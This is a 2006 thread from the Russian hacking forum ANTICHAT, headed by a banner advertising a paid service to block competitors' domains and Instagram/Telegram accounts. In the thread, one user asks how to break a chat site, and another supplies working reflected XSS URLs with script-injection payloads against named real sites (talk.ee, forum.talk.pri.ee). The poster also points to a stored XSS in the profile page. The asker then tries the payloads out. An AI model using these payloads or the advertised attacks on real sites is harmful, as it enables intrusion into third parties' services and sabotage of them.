УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
talk

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

08.08.2006, 11:53

Doredox

Новичок

Регистрация: 03.08.2006

Сообщений: 3

Провел на форуме:
18515

Репутация: 0

Все про него слышат в первый раз, потому что автор судя повсему изменил подпись. Поищи внешние признаки сходства с разными чатами, наблюдай за адресной строкой, если там пишутся какието файлы, поищи в гугле подобные и ищи оригинальное название чата, способов уйма.

#12

08.08.2006, 16:19

Dagon

Познающий

Регистрация: 27.03.2006

Сообщений: 86

Провел на форуме:
972602

Репутация: 52

Цитата:

Сообщение от De_X

ну а тада как этот чать кикнуть (Сломать нах)

может тебе это как-нибудь поможет:
xss в форуме этих чатовцев

Код:

http://forum.talk.pri.ee/cal_lite.php?cl_d=3\"><script>alert(1)</script>

Последний раз редактировалось Dagon; 08.08.2006 в 18:37..

#13

08.08.2006, 18:35

~~De_X~~

Banned

Регистрация: 30.11.2005

Сообщений: 95

Провел на форуме:
279326

Репутация: -12

Цитата:

Сообщение от Dagon

может тебе это как-нибудь поможет:
xxs в форуме этих чатовцев

Код:

http://forum.talk.pri.ee/cal_lite.php?cl_d=3"><script>alert(1)</script>&cl_m=08%22%3E&cl_y=2006&mode=display

Ок спасибо всем за помошь! Буду пробовать и в тоде время учиццца!

#14

08.08.2006, 18:56

Dagon

Познающий

Регистрация: 27.03.2006

Сообщений: 86

Провел на форуме:
972602

Репутация: 52

есть в этом чате еще активная xss в профиле. Работает только тогда, когда ты сам свой профиль редактируешь.

вот тут еще нашел xss

http://www.talk.ee/op.php?function=</script><hr /><script>alert(1)</script>&UserName=test1

работает тогда, когда ты в чате.

Последний раз редактировалось Dagon; 08.08.2006 в 18:59..

#15

10.08.2006, 01:12

~~De_X~~

Banned

Регистрация: 30.11.2005

Сообщений: 95

Провел на форуме:
279326

Репутация: -12

Цитата:

Сообщение от Dagon

Блин сидел мазги ипал чё куда http://www.talk.ee/op.php?function=</script><hr /><script>alert(1)</script>&UserName=test1
прописывать?

#16

10.08.2006, 01:16

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Ну если в начале хттп, то путем несложный умо заключений можно определить что это нужно вписывать в адресную строку

__________________
..

#17

10.08.2006, 02:27

~~De_X~~

Banned

Регистрация: 30.11.2005

Сообщений: 95

Провел на форуме:
279326

Репутация: -12

эт я понимаю! там мыскакивает окно шму ок и появляется экран чёрный с окошком инфо! как я понял http://www.talk.ee/op.php?function=</script><hr /><script>alert(1)</script>&UserName=test1 &UserName=test1 это должен быть чейто логин? но всёравно нечё я и свой вписывал и чужой